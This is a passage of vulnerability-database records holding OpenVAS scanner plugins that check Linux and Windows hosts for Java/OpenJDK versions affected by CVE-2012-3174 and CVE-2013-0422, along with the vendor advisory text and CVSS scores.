\"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-18T11:09:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of java-1_7_0-openjdk", "modified": "2018-01-17T00:00:00", "published": "2013-03-11T00:00:00", "id": "OPENVAS:850427", "href": "http://plugins.openvas.org/nasl.php?oid=850427", "type": "openvas", "title": "SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0199_1.nasl 8448 2018-01-17 16:18:06Z teissa $\n#\n# SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n - S8006125: Update MethodHandles library interactions\n\n * Bug fixes\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n - G422525: Fix building with PaX enabled kernels.\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n * add openjdk-7-src-b147-awt-crasher.patch\n - turn pulseaudio off on pre 11.4 distros\";\n\n\ntag_affected = \"java-1_7_0-openjdk on openSUSE 12.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html\");\n script_id(850427);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:19 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_xref(name: \"openSUSE-SU\", value: \"2013:0199_1\");\n script_name(\"SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1_7_0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:51:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of java-1.7.0-openjdk", "modified": "2017-07-12T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:870889", "href": "http://plugins.openvas.org/nasl.php?oid=870889", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java-1.7.0-openjdk on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-January/msg00036.html\");\n script_id(870889);\n script_version(\"$Revision: 6687 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:46:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:36:09 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0165-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\");\n\n script_summary(\"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "Check for the Version of java", "modified": "2018-01-25T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:881557", "href": "http://plugins.openvas.org/nasl.php?oid=881557", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos5 ", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n \n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n \n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. 
All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\");\n script_id(881557);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:37:56 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", 
rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-13T12:52:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2013-01-17T00:00:00", "id": "OPENVAS:803156", "href": "http://plugins.openvas.org/nasl.php?oid=803156", "type": "openvas", "title": "Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_java_se_mult_code_execution_vuln_win.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_insight = \"- An error in Java Management Extensions (JMX) MBean components which allows\n remote attackers to execute arbitrary code via unspecified vectors.\n - An unspecified error exists within the Libraries subcomponent.\n\n NOTE: The vendor reports that only version 7.x is affected. However,\n some security researchers indicate that some 6.x versions may\n be affected\";\n\ntag_impact = \"Successful exploitation allows remote attackers to execute arbitrary code\n via unspecified vectors,\n Impact Level: System/Application\";\n\ntag_affected = \"Oracle Java version 7 before Update 11 on windows\";\ntag_solution = \"Upgrade to Oracle Java 7 Update 11 or later\n For updates refer to\n http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\";\ntag_summary = \"This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.\";\n\nif(description)\n{\n script_id(803156);\n script_version(\"$Revision: 7699 $\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-17 12:41:59 +0530 (Thu, 17 Jan 2013)\");\n script_name(\"Oracle Java SE 
Multiple Remote Code Execution Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51820/\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1027972\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/625617\");\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_require_keys(\"Sun/Java/JRE/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\njreVer = \"\";\n\n## Get JRE Version from KB\njreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\n\nif(jreVer)\n{\n ## Check for Oracle Java SE versions 1.7 to 1.7.0_10\n if(version_in_range(version:jreVer, test_version:\"1.7\", test_version2:\"1.7.0.10\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-21T00:00:00", "id": "OPENVAS:1361412562310881564", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310881564", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-January/019204.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881564\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:39:47 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing 
an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. 
All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:41:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2013-03-11T00:00:00", "id": "OPENVAS:1361412562310850427", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850427", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n# Text descriptions are 
largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.850427\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:19 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2013:0199-1\");\n script_name(\"openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_7_0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n 
